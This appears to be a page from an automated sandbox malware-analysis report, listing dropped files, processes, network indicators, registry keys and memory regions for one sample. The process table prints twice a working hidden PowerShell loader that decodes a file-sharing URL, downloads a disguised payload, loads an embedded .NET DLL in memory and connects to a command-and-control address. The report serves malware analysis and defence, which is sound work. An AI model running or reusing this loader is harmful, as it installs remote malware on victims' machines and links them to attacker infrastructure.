Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ra2ran4q.ejl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0dsinev.5ec.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\cmd.exe
|
cmd /C "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg==';
$url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag
= '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command);
$assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('87.120.116.179', '1300');"
|
 |
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cHM6Ly8zMTA1LmZpbGVtYWlsLmNvbS9hcGkvZmlsZS9nZXQ/ZmlsZWtleT1tTDJfVG5JR0tRcW9jQjZ6THZjdk42OFRxX0ZwZkM0R2g4VkNnc3pfaURocVUzVVhfSF9veHYzY1V5c09VTHBNJnBrX3ZpZD1mZDRmNjE0YmIyMDljNjJjMTczMDg1MTQ3MGEwOTA0Zg==';
$url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient;
$imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag
= '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag);
$startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
$base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command);
$assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('87.120.116.179', '1300');
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_ox
|
unknown
|
||
|
https://3105.filemail.com/api/file/get?filekey=mL2_TnIGKQqocB6zLvcvN68Tq_FpfC4Gh8VCgsz_iDhqU3UX_H_oxv3cUysOULpM&pk_vid=fd4f614bb209c62c1730851470a0904f
|
193.30.119.205
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://3105.filemail.com
|
unknown
|
There are 4 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
ip.3105.filemail.com
|
193.30.119.205
|
||
|
3105.filemail.com
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.30.119.205
|
ip.3105.filemail.com
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7F750000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F27000
|
trusted library allocation
|
page read and write
|
||
|
4C2E000
|
stack
|
page read and write
|
||
|
2C80000
|
heap
|
page read and write
|
||
|
797E000
|
stack
|
page read and write
|
||
|
30E0000
|
trusted library allocation
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
863E000
|
stack
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
B98000
|
stack
|
page read and write
|
||
|
718E000
|
stack
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
3168000
|
trusted library allocation
|
page read and write
|
||
|
30F3000
|
trusted library allocation
|
page execute and read and write
|
||
|
77BF000
|
heap
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
79C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
8480000
|
trusted library allocation
|
page execute and read and write
|
||
|
4BAE000
|
stack
|
page read and write
|
||
|
7700000
|
trusted library allocation
|
page read and write
|
||
|
79F0000
|
trusted library allocation
|
page read and write
|
||
|
303E000
|
stack
|
page read and write
|
||
|
320E000
|
heap
|
page read and write
|
||
|
8570000
|
trusted library allocation
|
page read and write
|
||
|
7740000
|
heap
|
page read and write
|
||
|
7A50000
|
trusted library allocation
|
page read and write
|
||
|
4C60000
|
heap
|
page read and write
|
||
|
307E000
|
stack
|
page read and write
|
||
|
B9D000
|
stack
|
page read and write
|
||
|
79BD000
|
stack
|
page read and write
|
||
|
72E5000
|
heap
|
page execute and read and write
|
||
|
720D000
|
stack
|
page read and write
|
||
|
5038000
|
trusted library allocation
|
page read and write
|
||
|
759E000
|
stack
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
5053000
|
trusted library allocation
|
page read and write
|
||
|
71CF000
|
stack
|
page read and write
|
||
|
5DF9000
|
trusted library allocation
|
page read and write
|
||
|
5E37000
|
trusted library allocation
|
page read and write
|
||
|
3100000
|
trusted library allocation
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
7A30000
|
trusted library allocation
|
page read and write
|
||
|
4CED000
|
stack
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
714B000
|
stack
|
page read and write
|
||
|
74DD000
|
stack
|
page read and write
|
||
|
7810000
|
heap
|
page read and write
|
||
|
751E000
|
stack
|
page read and write
|
||
|
3256000
|
heap
|
page read and write
|
||
|
7796000
|
heap
|
page read and write
|
||
|
79E0000
|
trusted library allocation
|
page read and write
|
||
|
4E34000
|
trusted library allocation
|
page read and write
|
||
|
85FE000
|
stack
|
page read and write
|
||
|
3140000
|
trusted library allocation
|
page read and write
|
||
|
4ABE000
|
stack
|
page read and write
|
||
|
72E0000
|
heap
|
page execute and read and write
|
||
|
7790000
|
heap
|
page read and write
|
||
|
84A0000
|
trusted library allocation
|
page read and write
|
||
|
77AC000
|
heap
|
page read and write
|
||
|
755E000
|
stack
|
page read and write
|
||
|
75F2000
|
heap
|
page read and write
|
||
|
4DD1000
|
trusted library allocation
|
page read and write
|
||
|
72F0000
|
heap
|
page read and write
|
||
|
7A70000
|
trusted library allocation
|
page read and write
|
||
|
8650000
|
heap
|
page read and write
|
||
|
7A80000
|
trusted library allocation
|
page read and write
|
||
|
B5C000
|
stack
|
page read and write
|
||
|
77C4000
|
heap
|
page read and write
|
||
|
8490000
|
trusted library allocation
|
page read and write
|
||
|
75DE000
|
stack
|
page read and write
|
||
|
52A4000
|
trusted library allocation
|
page read and write
|
||
|
4DBD000
|
stack
|
page read and write
|
||
|
5041000
|
trusted library allocation
|
page read and write
|
||
|
327A000
|
heap
|
page read and write
|
||
|
749E000
|
stack
|
page read and write
|
||
|
3120000
|
trusted library allocation
|
page read and write
|
||
|
3125000
|
trusted library allocation
|
page execute and read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
776B000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page readonly
|
||
|
3188000
|
heap
|
page read and write
|
||
|
775D000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
4DC0000
|
heap
|
page execute and read and write
|
||
|
5043000
|
trusted library allocation
|
page read and write
|
||
|
4BEF000
|
stack
|
page read and write
|
||
|
4D2E000
|
stack
|
page read and write
|
||
|
504F000
|
trusted library allocation
|
page read and write
|
||
|
30F0000
|
trusted library allocation
|
page read and write
|
||
|
78FE000
|
stack
|
page read and write
|
||
|
788E000
|
stack
|
page read and write
|
||
|
854E000
|
stack
|
page read and write
|
||
|
31CE000
|
stack
|
page read and write
|
||
|
30BF000
|
stack
|
page read and write
|
||
|
77C7000
|
heap
|
page read and write
|
||
|
2D9D000
|
stack
|
page read and write
|
||
|
7A10000
|
trusted library allocation
|
page read and write
|
||
|
77B7000
|
heap
|
page read and write
|
||
|
2DE0000
|
heap
|
page read and write
|
||
|
4C67000
|
heap
|
page read and write
|
||
|
724A000
|
stack
|
page read and write
|
||
|
77B3000
|
heap
|
page read and write
|
||
|
31D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AFC000
|
stack
|
page read and write
|
||
|
7A60000
|
trusted library allocation
|
page read and write
|
||
|
7710000
|
heap
|
page execute and read and write
|
||
|
3109000
|
trusted library allocation
|
page read and write
|
||
|
7768000
|
heap
|
page read and write
|
||
|
324C000
|
heap
|
page read and write
|
||
|
793F000
|
stack
|
page read and write
|
||
|
85BF000
|
stack
|
page read and write
|
||
|
30F4000
|
trusted library allocation
|
page read and write
|
||
|
850E000
|
stack
|
page read and write
|
||
|
3160000
|
trusted library allocation
|
page read and write
|
||
|
5DD1000
|
trusted library allocation
|
page read and write
|
||
|
4B20000
|
heap
|
page read and write
|
||
|
4CAE000
|
stack
|
page read and write
|
||
|
7A00000
|
trusted library allocation
|
page read and write
|
||
|
7A40000
|
trusted library allocation
|
page read and write
|
||
|
77E9000
|
heap
|
page read and write
|
||
|
8470000
|
heap
|
page read and write
|
||
|
3110000
|
trusted library allocation
|
page read and write
|
||
|
3122000
|
trusted library allocation
|
page read and write
|
||
|
77A5000
|
heap
|
page read and write
|
||
|
7A90000
|
trusted library allocation
|
page read and write
|
||
|
8560000
|
trusted library allocation
|
page execute and read and write
|
||
|
311A000
|
trusted library allocation
|
page execute and read and write
|
||
|
77A1000
|
heap
|
page read and write
|
||
|
728D000
|
stack
|
page read and write
|
||
|
30FD000
|
trusted library allocation
|
page execute and read and write
|
||
|
77F6000
|
heap
|
page read and write
|
||
|
326F000
|
heap
|
page read and write
|
||
|
5DD9000
|
trusted library allocation
|
page read and write
|
||
|
7A20000
|
trusted library allocation
|
page read and write
|
||
|
3212000
|
heap
|
page read and write
|
||
|
72CA000
|
stack
|
page read and write
|
||
|
2DD6000
|
heap
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page read and write
|
||
|
8550000
|
heap
|
page read and write
|
||
|
321C000
|
heap
|
page read and write
|
||
|
31E9000
|
heap
|
page read and write
|
There are 131 hidden memdumps, click here to show them.